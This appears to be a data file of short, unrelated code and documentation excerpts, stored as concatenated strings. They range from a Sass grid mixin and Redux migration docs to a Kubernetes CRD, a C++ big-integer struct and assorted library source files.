column\n///\n/// @argument {number (unitless)} $columns [null]\n/// Specifies the number of columns an element should span based on the total\n/// columns of the grid.\n///\n/// This can also be defined in a shorthand syntax which also contains the\n/// total column count such as `3 of 5`.\n///\n/// @argument {map} $grid [$neat-grid]\n/// The grid to be used to generate the column.\n/// By default, the global `$neat-grid` will be used.\n///\n/// @example scss\n/// .element {\n/// @include grid-column(3);\n/// }\n///\n/// @example css\n/// .element {\n/// width: calc(25% - 25px);\n/// float: left;\n/// margin-left: 20px;\n/// }\n\n@mixin grid-column($columns: null, $grid: $neat-grid) {\n $columns: _neat-column-default($grid, $columns);\n $_grid-columns: _retrieve-neat-setting($grid, columns);\n $_grid-gutter: _retrieve-neat-setting($grid, gutter);\n\n width: calc(#{_neat-column-width($grid, $columns)});\n float: _neat-float-direction($grid);\n margin-#{_neat-float-direction($grid)}: $_grid-gutter;\n}" +"# Interop with an existing React Redux application\n\nThis recipe will guide you through the process of integrating Easy Peasy into your existing React Redux application. It is possible to slowly migrate an existing React Redux application to Easy Peasy without doing a full rewrite. \n\nEasy Peasy outputs a standard Redux store, and allows customisation of the store via the [StoreConfig](/docs/api/store-config.html). Therefore it is possible to configure the Easy Peasy redux store to match the needs of your existing application. You will likely be able to move your store into Easy Peasy without the need to make any changes to your components.\n\nThis would grant you the ability to slowly and carefully refactor your existing React Redux reducers into Easy Peasy models when needed, though there is nothing preventing you from keeping the concepts (Easy Peasy models, and React Redux reducers) living side by side indefinitely.\n\n## Refactoring the creation of your store\n\nImagine you had a Redux store being configured similarly to the following.\n\n```javascript\nimport { createStore, combineReducers, applyMiddleware } from 'redux';\nimport productsReducer from './reducers/products';\nimport basketReducer from './reducers/basket';\nimport loggerMiddleware from './middleware/logger';\n\nconst rootReducer = combineReducers({\n products: productsReducer,\n basket: basketReducer\n});\n\nconst store = createStore(rootReducer, applyMiddleware(loggerMiddleware));" +"# Changelog\n\n## [v0.11.2]\n\nMinor:\n\n* Switch to standard MIT SPDX license\n\n## [v0.11.0]\n\nFeatures:\n\n* Add support for `Expect-CT` header. Allows excluding domains that will not have the `Expect-CT` header applied. By default, the `Expect-CT` header will not be applied to localhost. It is also only applied to HTTPS requests \n* Add support for `worker-src` directive for `Content-Security-Policy` header\n\n## [v0.10.0]\n\nBreaking Changes:\n\n* Drop support for ASP.NET Core 1.x\n* Add support for ASP.NET Core 3.0\n\n## [v0.9.0]\n\nFeatures:\n\n* Add support for Nonce generation for `Content-Security-Policy` headers. See [README.md](https://github.com/andrewlock/NetEscapades.AspNetCore.SecurityHeaders/blob/master/README.md#using-nonces-and-generated-hashes-with-content-security-policy) for details\n* Add [TagHelpers](https://www.nuget.org/packages/NetEscapades.AspNetCore.SecurityHeaders.TagHelpers/) library for adding nonces and generating hashes for Razor elements. \n* Allow using HSTS preload with `Strict-Transport-Security`\n* Allow excluding domains from `Strict-Transport-Security`. Similar to the [Microsoft `HstsMiddleware`](https://github.com/aspnet/BasicMiddleware/blob/master/src/Microsoft.AspNetCore.HttpsPolicy/HstsMiddleware.cs), you can skip applying `Strict-Transport-Security` to specific hosts\n\nBreaking Changes:\n\n* All obsolete classes have been removed.\n* Many classes have changed namespace to better reflect their location in the project, and also to aid discovery. If you're using the recommended builders and extension methods, you should not have any build-time breaking changes, but the package is not runtime-compatible with previous versions\n* The `Strict-Transport-Security` header is no longer applied to `localhost` by default. Generally" +"//\n// Takes a screenshot of the given URL, uses named arguments passed in like so: phantomjs raster.js arg=value arg2=value2\n//\n// Arguments:\n// - url - URL to screenshot\n// - output - page to output (e.g. /tmp/output.png)\n// - width [optional] - default 1024 - viewport width\n// - height [optional] - viewport height (see note below on using height)\n// - debug [optional] - default false - whether to do some extra debugging\n// - div [optional] - a selector to use to screenshot to a specific element\n// - resourceWait [optional] - default 300 - the time to wait after the last resource has loaded in MS before taking the screenshot\n// - maxRenderWait [optional] - default 10000 - the maximum time to wait before taking the screenshot, regardless of whether resources are waiting to be loaded\n// - cutoffWait [optional] - default null - the maximum time to wait before cutting everything off and failing...this helps if there is a page taking a long time to load\n// - top, left, width, height [optional] - dimensions to use to screenshot a specific area of the screen\n//\n// == Important notice when providing height ==" +"This project is **NOT MAINTAINED**.\n\n------\n\n![hermes logo](http://i.imgur.com/1ZbEIuH.png)\n\n![hermes text](http://i.imgur.com/vlg4X61.png)\n\n**Hermes is a simple and robust in-app notification system for iOS written in Swift.** It supports posting Notifications with styled or unstyled text, an icon, sound, color, and an action closure. You can easily build your own notification template and add any number of attributes and features to a HermesNotification.\n\nHermes shows all queued up notifications at once, with an easy way to swipe through them (and will animate through them automatically if you don't touch any notifications for 3 seconds)\n\n##Installation\n###Cocoapods Installation\nHermes is available on CocoaPods. Just add the following to your project Podfile:\n\n```\npod 'Hermes', '~> 1.0'\n```\n\n###Non-Cocoapods Installation\nYou can drop Hermes' files directly into your project, or drag the Hermes project into your workspace.\n\n###Usage\nImport in **Swift**\n```swift\nimport Hermes\n```\nor **Objective-C**\n```objective-c\n#import \n```\n\n##Getting Started\n###Components\n- **Hermes** (public)\n\n You will use Hermes.sharedInstance to post Notifications. You can tell Hermes when to *wait()* and collect notifications and when to *go()* and post notifications as soon as Hermes has any.\n \n- **Notification** (public, extendable)\n\n A Notification is a model that has attributes like text, image, sound, and color." +"\n * @license https://opensource.org/licenses/MIT MIT License\n * @link http://github.com/kevinfiol\n */\n\nclass Fuzz\n{\n private $_source;\n private $_sourceLen;\n private $_maxResults;\n private $_searchMode;\n private $_useLCS;\n\n /**\n * Fuzz Object Constructor\n * Initialize private variables\n *\n * @param array $source An array of associative arrays\n * @param int $maxResults The maximum number of results to retrieve upon a search\n * @param int $searchMode 0 = Levenshtein, 1 = Jaro-Winkler\n * @param boolean $useLCS Factor in Longest Common Substring in search results\n */\n public function __construct($source, $maxResults, $searchMode, $useLCS)\n {\n $this->_source = $source;\n $this->_sourceLen = count($source);\n $this->_maxResults = max($maxResults, 1);\n $this->_useLCS = $useLCS;\n\n if ($searchMode < 0 || $searchMode > 1) {\n throw new \\Exception('Invalid search mode');\n } else {\n $this->_searchMode = $searchMode;\n }\n }\n\n /**\n * Search Method\n * Initiate Search\n *\n * @param string $search Term to search for\n * @param int $minLCS (if using LCS) Specify the minimum longest common substring\n * @param int $maxDistance (if using Levenshtein) Specify the maximum distance allowed\n *\n * @return array $results Array of associative arrays" +"grammar Jnu;\noptions {\n output = AST; // build trees\n ASTLabelType = JnuAST;\n}\n\ntokens {\n METHOD_DECL; // function definition\n ARG_DECL; // parameter\n BLOCK;\n MEMBERS; // class body\n VAR_DECL;\n FIELD_DECL;\n CALL;\n ELIST; // expression list\n EXPR; \t // root of an expression\n ASSIGN='=';\n EXTENDS;\n}\n\ncompilationUnit\n : ( classDefinition | varDeclaration | methodDeclaration )+ EOF\n ;\n\n// START: class\nclassDefinition\n : 'class' ID superClass? '{' classMember+ '}' ';'\n -> ^('class' ID superClass? ^(MEMBERS classMember+))\n ;\nsuperClass\n\t:\t':' 'public' ID -> ^(EXTENDS ID)\n\t;\n// END: class\n\nclassMember\n\t:\ttype ID ('=' expression)? ';' -> ^(FIELD_DECL type ID expression?)\n\t|\tmethodDeclaration\n\t|\t'public' ':' -> // throw away; just making input valid C++\n\t;\n\t\n// START: method\nmethodDeclaration\n : type ID '(' formalParameters? ')' block\n -> ^(METHOD_DECL type ID formalParameters? block)\n ;\n// END: method\n\nformalParameters\n : type ID (',' type ID)* -> ^(ARG_DECL type ID)+\n ;\n\ntype: 'float'\n | 'int'\n |\t'void'\n |\tID // class type name\n ;\n\n// START: block\nblock\n : '{' statement* '}' -> ^(BLOCK statement*)\n ;\n// END: block\n\n// START: var\nvarDeclaration\n : type ID ('=' expression)? ';' -> ^(VAR_DECL type ID expression?)\n ;\n// END: var\n\nstatement\n : block\n |\tvarDeclaration\n | 'return'" +"import org.jetbrains.numkt.array\nimport org.jetbrains.numkt.columnStack\nimport org.jetbrains.numkt.core.reshape\nimport org.jetbrains.numkt.hstack\nimport org.jetbrains.numkt.vstack\nimport kotlin.test.Test\nimport kotlin.test.assertEquals\n\nclass TestStackingArrays {\n\n @Test\n fun testStackTwoArrays() {\n val checkVStack = array(arrayOf(0, 1, 2, 3, 4, 5, 6, 7)).reshape(4, 2)\n val checkHStack = array(arrayOf(0, 1, 4, 5, 2, 3, 6, 7)).reshape(2, 4)\n\n val a = array(arrayOf(0, 1, 2, 3)).reshape(2, 2)\n\n val b = array(arrayOf(4, 5, 6, 7)).reshape(2, 2)\n\n println(a)\n println(b)\n\n println(\"vstack:\")\n println(vstack(a, b))\n assertEquals(checkVStack, vstack(a, b))\n\n println(\"hstack:\")\n println(hstack(a, b))\n assertEquals(checkHStack, hstack(a, b))\n }\n\n @Test\n fun testNewAxis() {\n val a = array(arrayOf(0, 1, 2, 3)).reshape(2, 2)\n val b = array(arrayOf(4, 5, 6, 7)).reshape(2, 2)\n\n println(columnStack(a, b))\n\n val q = array(arrayOf(4.0, 2.0))\n val w = array(arrayOf(3.0, 8.0))\n\n println(columnStack(q, w))\n println(hstack(q, w))\n }\n}" +"package com.alibaba.doris.admin.service.impl;\n\nimport java.net.InetAddress;\nimport java.net.UnknownHostException;\n\nimport org.apache.commons.lang.StringUtils;\nimport org.apache.commons.logging.Log;\nimport org.apache.commons.logging.LogFactory;\n\nimport com.alibaba.doris.admin.service.AdminService;\nimport com.alibaba.doris.common.util.IPAddressUtil;\n\n/**\n * @project :Doris\n * @author : len.liu\n * @datetime : 2011-7-4 \u4e0b\u534806:14:43\n * @version :\n * @Modification:\n */\npublic class AdminServiceImp implements AdminService {\n\n\tprivate static final Log logger = LogFactory.getLog(AdminServiceImp.class);\n\n private String masterIP;\n\n public boolean isMasterAdmin() {\n String ip = IPAddressUtil.getIPAddress();\n return isMasterAdmin(ip);\n }\n\n public boolean isMasterAdmin(String ip) {\n \t\n \tif( StringUtils.isBlank(ip) || StringUtils.isBlank(masterIP)) {\n \t\treturn false;\n \t}\n \t\n \tInetAddress address;\n\t\ttry {\n\t\t\taddress = InetAddress.getByName( masterIP );\n\t\t\tString aIP = address.getHostAddress();\n\t return StringUtils.equals(ip, aIP);\n\t\t} catch (UnknownHostException e) {\n\t\t\tlogger.error(\"Invalid master ip/domain: \" + masterIP, e);\n\t\t\tthrow new IllegalArgumentException(\"Invalid master ip/domain: \" + masterIP, e);\n\t\t}\n \n }\n\n public void setMasterIP(String masterIP) {\n this.masterIP = masterIP;\n }\n \n public static void main(String[] args) {\n \tAdminServiceImp adminServiceImp = new AdminServiceImp();\n \t\n \tadminServiceImp.setMasterIP(\"doris-test.alibaba-inc.com\");\n \tlogger.info(\"Local is master ? \" + adminServiceImp.isMasterAdmin() ) ;\n \t\n\t}\n\n}" +"Exercise nbextension history\n----------------------------\n\nUpdate december 30, 2015:\n(@jfbercher) Updated to jupyter notebook 4.1.x\n\nUpdate december 22, 2015:\n(@jfbercher)\n Added the metadata solution_first to mark the beginning of an exercise. It is now possible to have several consecutive exercises. \n\nOctober 21-27,2015: \n(@jfbercher)\n\n1- the extension now works with the multicell API, that is\n - several cells can be selected either via the rubberband extension \n - or via Shift-J (select next) or Shift-K (select previous) keyboard shortcuts\n(probably Shit-up and down will work in a near future) \nNote: previously, the extension required the selected cells to be marked with a \"selected\" key in metadata. This is no more necessary with the new API.\nThen clicking on the toolbar button turns these cells into a \"solution\" which is hidden by default ** Do not forget to keep the Shift key pressed down while clicking on the menu button (otherwise selected cells will be lost)** \n2- the \"state\" of solutions, hidden or shown, is saved and restored at reload/restart. We use the \"solution\" metadata to store the current state.\n3- A small issue (infinite loop when a solution was defined at the bottom edge of the notebook have been corrected)\n4- Added a" +"import fridgets.*;\nimport javax.swing.*;\nimport java.util.ArrayList;\nimport nz.sodium.*;\n\npublic class textfield {\n public static void main(String[] args) {\n JFrame frame = new JFrame(\"button\");\n frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);\n frame.setContentPane(Transaction.run(() -> {\n FrTextField firstName = new FrTextField(\"Joe\");\n FrTextField lastName = new FrTextField(\"Bloggs\");\n FrButton ok = new FrButton(new Cell<>(\"OK\"));\n FrButton cancel = new FrButton(new Cell<>(\"Cancel\"));\n ArrayList fridgets = new ArrayList<>();\n fridgets.add(ok);\n fridgets.add(cancel);\n Fridget buttons = new FrFlow(FrFlow.Direction.HORIZONTAL,\n fridgets);\n fridgets = new ArrayList<>();\n fridgets.add(firstName);\n fridgets.add(lastName);\n fridgets.add(buttons);\n Fridget dialog =\n new FrFlow(FrFlow.Direction.VERTICAL, fridgets);\n Listener l =\n ok.sClicked\n .map(u -> firstName.text.sample()+\" \"+\n lastName.text.sample())\n .listen(name -> System.out.println(\"OK: \"+name))\n .append(\n cancel.sClicked.listen(\n u -> System.out.println(\"Cancel\")\n )\n );\n return new FrView(frame, dialog) {\n public void removeNotify() {\n super.removeNotify();\n l.unlisten();\n }\n };\n }));\n frame.setSize(360,120);\n frame.setVisible(true);\n }\n}" +"\ufeffusing RuriLib;\nusing RuriLib.Interfaces;\nusing RuriLib.ViewModels;\nusing System;\nusing System.Collections.Generic;\nusing System.Collections.ObjectModel;\nusing System.IO;\nusing System.Threading.Tasks;\nusing System.Windows;\nusing System.Windows.Data;\n\nnamespace OpenBullet\n{\n public enum Components\n {\n Main,\n RunnerManager,\n Runner,\n ProxyManager,\n WordlistManager,\n HitsDB,\n ConfigManager,\n Stacker,\n OtherOptions,\n Settings,\n ListGenerator,\n SeleniumTools,\n Database,\n About,\n Unknown\n }\n\n public class LoggerViewModel : ViewModelBase, ILogger\n {\n public ObservableCollection EntriesCollection { get; set; }\n\n public IEnumerable Entries => EntriesCollection;\n\n public bool Enabled\n {\n get\n {\n try\n {\n // The settings might be null\n return OB.OBSettings.General.EnableLogging;\n }\n catch\n {\n return false;\n }\n }\n }\n\n public int BufferSize\n {\n get\n {\n try\n {\n // The settings might be null\n return OB.OBSettings.General.LogBufferSize;\n }\n catch\n {\n return 0;\n }\n }\n }\n\n public LoggerViewModel()\n {\n EntriesCollection = new ObservableCollection();\n\n CollectionView view = (CollectionView)CollectionViewSource.GetDefaultView(EntriesCollection);\n view.Filter = ErrorFilter;\n }\n\n public void Refresh()\n {\n try\n {\n CollectionViewSource.GetDefaultView(EntriesCollection).Refresh();\n }\n catch { }\n }\n\n #region Filters\n private bool onlyErrors = false;\n public bool OnlyErrors { get { return onlyErrors; } set { onlyErrors = value; OnPropertyChanged(); Refresh(); } }\n \n private string searchString = \"\";\n public string SearchString { get { return searchString; } set { searchString = value; OnPropertyChanged(); } }\n\n private bool ErrorFilter(object item)\n {\n // If search box not empty, filter out all the stuff" +"module T8603 where\n\nimport Control.Monad\nimport Data.Functor\nimport Control.Monad.Trans.Class( lift )\nimport Control.Monad.Trans.State( StateT )\n\nnewtype RV a = RV { getPDF :: [(Rational,a)] } deriving (Show, Eq)\n\ninstance Functor RV where\n fmap f = RV . map (\\(x,y) -> (x, f y)) . getPDF\n\ninstance Applicative RV where\n pure = return\n (<*>) = ap\n\ninstance Monad RV where\n return x = RV [(1,x)]\n rv >>= f = RV $\n do (p,a) <- getPDF rv\n guard (p > 0)\n (q,b) <- getPDF $ f a\n guard (q > 0)\n return (p*q, b)\n\ntype RVState s a = StateT s RV a\n\nuniform :: [a] -> RV a\nuniform x = RV [(1/fromIntegral (length x), y) | y <- x]\n\ntestRVState1 :: RVState s Bool\ntestRVState1\n = do prize <- lift uniform [1,2,3]\n return False\n\n-- lift :: (MonadTrans t, Monad m) => m a -> t m a" +"---\ndescription: A Metadata Provider is a JavaScript function that acts as an interface for accessing metadata related to Images in Cornerstone.\n---\n\n# Metadata Providers\n\n> A **Metadata Provider** is a JavaScript function that acts as an interface for accessing metadata related to Images in Cornerstone. Users can define their own provider functions in order to return any metadata they wish for each specific image.\n\nMedical images typically come with lots of non-pixel-wise metadata such as for example, the pixel spacing of the image, the patient ID, or the scan acquisition date. With some file types (e.g. DICOM), this information is stored within the file header and can be read and parsed and passed around your application. With others (e.g. JPEG, PNG), this information needs to be provided independently from the actual pixel data. Even for DICOM images, however, it is common for application developers to provide metadata independently from the transmission of pixel data from the server to the client since this can considerably improve performance.\n\nTo handle these scenarios, Cornerstone provides infrastructure for the definition and usage of *Metadata Providers*. Metadata Providers are simply functions which take in an [Image Id](image-ids.md) and specified metadata type, and return" +"# plex2netflix\n\nThis simple tool checks how much of your media from Plex is available to watch on Netflix, and gives you a nice summary with the percentage of media that is available.\n\nI made this tool because I someday want to make the jump to Netflix, but I want to know beforehand how much of the media I have is available there.\n\nIt works by using the Plex Web API to get a list of all media from given library section. If an item has an IMDb ID (you need to enable the IMDb agent for this in Plex), it uses this to search in the [uNoGS](http://unogs.com/) database which has Netflix availability data. If there is no IMDb ID, the item title and year are used.\n\n[**Powered by uNoGS**](http://unogs.com/).\n\n\"Example\"\n\n## Install\n\nYou need to have [Node.js](https://nodejs.org) (4.0 or higher). Install the tool with the node package manager:\n\n```\nnpm install -g plex2netflix\n```\n\nTo update, just run the command above again.\n\n## Usage\n\nFirst, you need to get your [API token from Plex](https://support.plex.tv/hc/en-us/articles/204059436-Finding-your-account-token-X-Plex-Token).\n\n```\nplex2netflix --host 192.168.0.42 --token=xxx --country=us --section=Movies\n```\n\nBy default it searches the Netflix library of the US. You can specify `--country`" +"# Selection Sort\n\n#### Problem Statement\n\nGiven an unsorted array of n elements, write a function to sort the array\n\n#### Approach\n\n- select the smallest element from the array\n- put it at the beginning of the array\n- then select the smallest array from the remaining unsorted list\n- append it to the sorted array at the beginning\n- keep doing this for every element of the array\n- repeat the above process n times\n\n#### Time Complexity\n\nO(n^2) Worst case performance\n\nO(n^2) Best-case performance\n\nO(n^2) Average performance\n\n#### Space Complexity\n\nO(1) Worst case\n\n\n#### Example\n\n```\narr[] = {80, 10, 40, 30}\nIndexes: 0 1 2 3 \n\n1. Index = 0 \n\tSelect the minimum number from the array (between index 0-3), ie, 10\n2. Swap 10 and 80 (arr[0])\n3. The array now is {10, 80, 40, 30}\n\n4. Index = 1\n\tSelect the minimum number from the array (between index 1-3), ie, 30\n5. Swap 30 and 80 (arr[1])\n6. The array now is {10, 30, 40, 80}\n\n7. Index = 2\n\tSelect the minimum number from the array (between index 2-3), ie, 40\n8. Swap 40 and 40 (arr[2])\n9. The array now is {10," +"\n * $ingest = Omeka_File_Ingest_AbstractIngest::factory('Url', $item);\n * $fileRecords = $ingest->ingest('http://www.example.com');\n * \n * \n * @package Omeka\\File\\Ingest\n */\nabstract class Omeka_File_Ingest_AbstractIngest\n{\n /**\n * @var Item\n */\n protected $_item;\n\n /**\n * Set of arbitrary options to use when ingesting files.\n *\n * @var array\n */\n protected $_options = array();\n\n /**\n * Set of validators implementing Zend_Validate_Interface.\n * \n * @var array\n * @see Omeka_File_Ingest_AbstractIngest::addValidator()\n */\n private $_validators = array();\n\n /**\n * The current validated file MIME type.\n * \n * @see Omeka_Validate_File_MimeType::isValid()\n * @var string\n */" +"struct intx {\n intx() { normalize(1); }\n intx(string n) { init(n); }\n intx(int n) { stringstream ss; ss << n; init(ss.str()); }\n intx(const intx& other)\n : sign(other.sign), data(other.data) { }\n int sign;\n vector data;\n static const int dcnt = 9;\n static const unsigned int radix = 1000000000U;\n int size() const { return data.size(); }\n void init(string n) {\n intx res; res.data.clear();\n if (n.empty()) n = \"0\";\n if (n[0] == '-') res.sign = -1, n = n.substr(1);\n for (int i = n.size() - 1; i >= 0; i -= intx::dcnt) {\n unsigned int digit = 0;\n for (int j = intx::dcnt - 1; j >= 0; j--) {\n int idx = i - j;\n if (idx < 0) continue;\n digit = digit * 10 + (n[idx] - '0'); }\n res.data.push_back(digit); }\n data = res.data;\n normalize(res.sign); }\n intx& normalize(int nsign) {\n if (data.empty()) data.push_back(0);\n for (int i = data.size() - 1; i > 0 && data[i] == 0; i--)\n data.erase(data.begin() + i);\n sign = data.size() == 1 && data[0] == 0 ? 1 : nsign;\n return *this; }\n friend ostream& operator <<(ostream& outs, const intx& n) {\n if (n.sign < 0) outs << '-';\n bool first = true;\n for (int i" +"---\n# CRD in version v1beta1. Use this for Kubernetes clusters < 1.16\n\n# CRD connecting a ConfigMap with a set of pods which needs to\n# be restarted when the ConfigMap changes\n# CRD connecting a ConfigMap with a set of pods which needs to\n# be restarted when the ConfigMap changes\napiVersion: apiextensions.k8s.io/v1beta1\nkind: CustomResourceDefinition\nmetadata:\n name: configwatchers.k8spatterns.io\nspec:\n scope: Namespaced\n group: k8spatterns.io\n # Additional columns to print when in kubectl get\n additionalPrinterColumns:\n - name: configmap\n description: Name of ConfigMap to watch\n type: string\n JSONPath: .spec.configMap\n - name: podselector\n description: Selector for Pods to restart\n type: string\n JSONPath: .spec.podSelector\n versions:\n - name: v1\n # Enabled\n served: true\n # The version stored in the backend\n storage: true\n names:\n # Kind of this CRD\n kind: ConfigWatcher\n # How to access them via client and REST api\n singular: configwatcher\n plural: configwatchers\n # How to access the CRDs as well (e.g. with \"kubectl get cw\")\n shortNames: [ cw ]\n # Adds Configwatcher to the \"all\" category (e.g. \"kubectl get all\")\n categories: [ all ]\n validation:\n # Validation schema\n openAPIV3Schema:\n properties:\n spec:\n properties:\n configMap:\n type: string\n description: Name of the ConfigMap to monitor for changes\n podSelector:\n type: object\n description: Label selector used for" +"// Copyright 2000-2019 JetBrains s.r.o. Use of this source code is governed by the Apache 2.0 license that can be found in the LICENSE file.\npackage org.jetbrains.io.jsonRpc;\n\nimport com.intellij.diagnostic.PluginException;\nimport com.intellij.openapi.components.ComponentManager;\nimport com.intellij.openapi.components.ServiceManager;\nimport com.intellij.openapi.extensions.ExtensionPointName;\nimport com.intellij.openapi.extensions.PluginDescriptor;\nimport com.intellij.serviceContainer.BaseKeyedLazyInstance;\nimport com.intellij.util.xmlb.annotations.Attribute;\nimport org.jetbrains.annotations.NotNull;\nimport org.jetbrains.annotations.Nullable;\n\npublic final class JsonRpcDomainBean extends BaseKeyedLazyInstance {\n public static final ExtensionPointName EP_NAME = ExtensionPointName.create(\"org.jetbrains.jsonRpcDomain\");\n\n @Attribute(\"name\")\n public String name;\n\n @Attribute(\"implementation\")\n public String implementation;\n\n @Attribute(\"service\")\n public String service;\n\n @Attribute(\"overridable\")\n public boolean overridable;\n\n @NotNull\n @Override\n public Object createInstance(@NotNull ComponentManager componentManager, @NotNull PluginDescriptor pluginDescriptor) {\n if (service == null) {\n return super.createInstance(componentManager, pluginDescriptor);\n }\n else {\n try {\n return ServiceManager.getService(Class.forName(service, true, pluginDescriptor.getPluginClassLoader()));\n }\n catch (Throwable e) {\n throw new PluginException(e, pluginDescriptor.getPluginId());\n }\n }\n }\n\n @Override\n protected @Nullable String getImplementationClassName() {\n return implementation;\n }\n}" +"Check the lexical scoping of the switch keywords.\n(The actual behaviour is tested in t/op/switch.t)\n\n__END__\n# No switch; given should be a bareword.\nuse warnings; no warnings 'experimental::smartmatch';\nprint STDOUT given;\nEXPECT\nUnquoted string \"given\" may clash with future reserved word at - line 3.\ngiven\n########\n# No switch; when should be a bareword.\nuse warnings; no warnings 'experimental::smartmatch';\nprint STDOUT when;\nEXPECT\nUnquoted string \"when\" may clash with future reserved word at - line 3.\nwhen\n########\n# No switch; default should be a bareword.\nuse warnings; no warnings 'experimental::smartmatch';\nprint STDOUT default;\nEXPECT\nUnquoted string \"default\" may clash with future reserved word at - line 3.\ndefault\n########\n# No switch; break should be a bareword.\nuse warnings; no warnings 'experimental::smartmatch';\nprint STDOUT break;\nEXPECT\nUnquoted string \"break\" may clash with future reserved word at - line 3.\nbreak\n########\n# No switch; but continue is still a keyword\nprint STDOUT continue;\nEXPECT\nCan't \"continue\" outside a when block at - line 2.\n########\n# Use switch; so given is a keyword\nuse feature 'switch'; no warnings 'experimental::smartmatch';\ngiven(\"okay\\n\") { print }\nEXPECT\nokay\n########\n# Use switch; so when is a keyword\nuse feature 'switch';" +"\ufeff// Copyright (C) 2001 and 2002 by Carl Edward Rasmussen. Date 2002-02-13\r\n//\r\n// (C) Copyright 1999, 2000 & 2001, Carl Edward Rasmussen\r\n// \r\n// Permission is granted for anyone to copy, use, or modify these\r\n// programs and accompanying documents for purposes of research or\r\n// education, provided this copyright notice is retained, and note is\r\n// made of any changes that have been made.\r\n// \r\n// These programs and documents are distributed without any warranty,\r\n// express or implied. As the programs were written for research\r\n// purposes only, they have not been tested to the degree that would be\r\n// advisable in any important application. All use of these programs is\r\n// entirely at the user's own risk.\r\n//\r\n//\r\n// This code has been contributed by Peter Sergio Larsen based on the original\r\n// from Edward Rasmussen's FminCG. Please note that this code is only available\r\n// under a special license that specifically *denies* the use for commercial\r\n// applications and is thus *not compatible with the LGPL and the GPL*. Use\r\n// at your own risk.\r\n//\r\n\r\nnamespace Accord.Math.Optimization\r\n{\r\n using System;\r\n\r\n /// \r\n /// Non-linear Conjugate Gradient (WARNING: This code can not be used" +"/*\n * See Licensing and Copyright notice in naev.h\n */\n\n/**\n * @file nlua_var.c\n *\n * @brief Lua Variable module.\n */\n\n\n#include \"nlua_var.h\"\n\n#include \"naev.h\"\n\n#include \n#include \n#include \"nstring.h\"\n#include \n\n#include \n#include \n\n#include \"nluadef.h\"\n#include \"log.h\"\n#include \"nxml.h\"\n\n\n\n/* similar to Lua vars, but with less variety */\n#define MISN_VAR_NIL 0 /**< Nil type. */\n#define MISN_VAR_NUM 1 /**< Number type. */\n#define MISN_VAR_BOOL 2 /**< Boolean type. */\n#define MISN_VAR_STR 3 /**< String type. */\n/**\n * @struct misn_var\n *\n * @brief Contains a mission variable.\n */\ntypedef struct misn_var_ {\n char* name; /**< Name of the variable. */\n char type; /**< Type of the variable. */\n union {\n double num; /**< Used if type is number. */\n char* str; /**< Used if type is string. */\n int b; /**< Used if type is boolean. */\n } d; /**< Variable data. */\n} misn_var;\n\n\n/*\n * variable stack\n */\nstatic misn_var* var_stack = NULL; /**< Stack of mission variables. */\nstatic int var_nstack = 0; /**< Number of mission variables. */\nstatic int var_mstack = 0; /**< Memory size of the mission variable stack. */\n\n\n/*\n * prototypes\n */\n/* static */\nstatic int" +"FROM ubuntu:18.04\nMAINTAINER Intrigue Team \nENV DEBIAN_FRONTEND noninteractive\n\nUSER root\n\n# Get up to date\nRUN apt-get -y update && apt-get -y install sudo\n\n# Set us up!\nWORKDIR /core\n\n# Set up intrigue\nENV BUNDLE_JOBS=12\nENV PATH /root/.rbenv/bin:$PATH\nENV IDIR=/core\nENV DEBIAN_FRONTEND=noninteractive\n\n# create a volume\nVOLUME /data\n\n# copy intrigue code\nCOPY . /core/\n\n# install intrigue-specific software & config\nRUN /bin/bash /core/util/bootstrap-worker.sh\n\n# Remove the config file so one generates on startup (useful when testing)\nRUN if [ -e /core/config/config.json ]; then rm /core/config/config.json; fi\n\n# Expose the port\nEXPOSE 7777\n\nRUN chmod +x /core/util/start-worker.sh\nENTRYPOINT [\"/core/util/start-worker.sh\"]" +"Package[\"SetReplace`\"]\n\nPackageScope[\"setSubstitutionSystem$wl\"]\n\n(* This is the implementation of setSubstitutionSystem in Wolfram Language. Works better with larger vertex degrees,\n but is otherwise much slower. Supports arbitrary pattern rules with conditions. Does not support multiway systems. *)\n\n(* We are going to transform set substitution rules into a list of n! normal rules, where elements of the input subset\n are arranged in every possible order with blank null sequences in between. *)\n\nallLeftHandSidePermutations[input_Condition :> output_List] := Module[\n {inputLength, inputPermutations, heldOutput},\n inputLength = Length @ input[[1]];\n\n inputPermutations = Permutations @ input[[1]];\n heldOutput = Thread @ Hold @ output;\n\n With[{right = heldOutput, condition = input[[2]]}, (* condition is already held before it's passed here *)\n # /; condition :> right & /@ inputPermutations] /. Hold[expr_] :> expr\n] \n\n(* Now, if there are new vertices that need to be created, we will disassemble the Module remembering which variables\n it applies to, and then reassemble it for the output. *)\n\nallLeftHandSidePermutations[input_Condition :> output_Module] := Module[\n {ruleInputOriginal = input[[1]],\n ruleCondition = heldPart[input, 2],\n heldModule = mapHold[output, {0, 1}],\n moduleInputContents},\n moduleInputContents = heldModule[[1, 2]];\n With[{ruleInputFinal = #[[1]],\n moduleArguments = heldModule[[1, 1]],\n moduleOutputContents = (Hold /@ #)[[2]]},\n ruleInputFinal :> Module[moduleArguments, moduleOutputContents]\n ] & /@ allLeftHandSidePermutations[\n ruleInputOriginal /; ruleCondition" +"using System;\nusing System.Collections;\nusing System.Collections.Generic;\nusing System.Linq;\n\nnamespace FormFactory\n{\n public interface FfHtmlHelper \n {\n UrlHelper Url();\n string WriteTypeToString(Type type);\n ViewData ViewData { get; }\n IViewFinder ViewFinder { get; }\n //string Partial(string partialName, object vm); \n void RenderPartial(string partialName, object model);\n PropertyVm CreatePropertyVm(Type objectType, string name);\n\n }\n\n public interface FfHtmlHelper : FfHtmlHelper\n {\n //string Partial(string partialName, object vm, TViewData viewData);\n }\n public interface IViewFinder\n {\n IViewFinderResult FindPartialView(string partialViewName);\n }\n\n public interface IViewFinderResult\n {\n View View { get; }\n }\n public class View\n {\n \n }\n\n\n public class ViewData \n {\n public ViewData(IModelStateDictionary modelState, object model)\n {\n ModelState = modelState;\n Model = model;\n }\n\n public ViewData()\n {\n ModelState = new FfModelStateDictionary();\n }\n\n public IModelStateDictionary ModelState { get; private set; }\n public object Model { get; private set; }\n }\n\n\n public class FfModelStateDictionary : Dictionary, IModelStateDictionary\n {\n public bool IsValid => Values.SelectMany(v => v.Errors).Any(e => e != null) == false;\n }\n\n public interface IModelStateDictionary\n {\n bool TryGetValue(string key, out ModelState modelState);\n ModelState this[string key] { get; }\n bool ContainsKey(string key);\n bool IsValid { get; }\n }\n\n public class ModelState\n {\n public ModelState()\n {\n \n }\n\n public ModelState(FormFactoryModelStateErrors errors, FormFactoryModelStateValue value)\n {\n Errors = errors;\n Value = value;\n }\n\n public FormFactoryModelStateValue Value 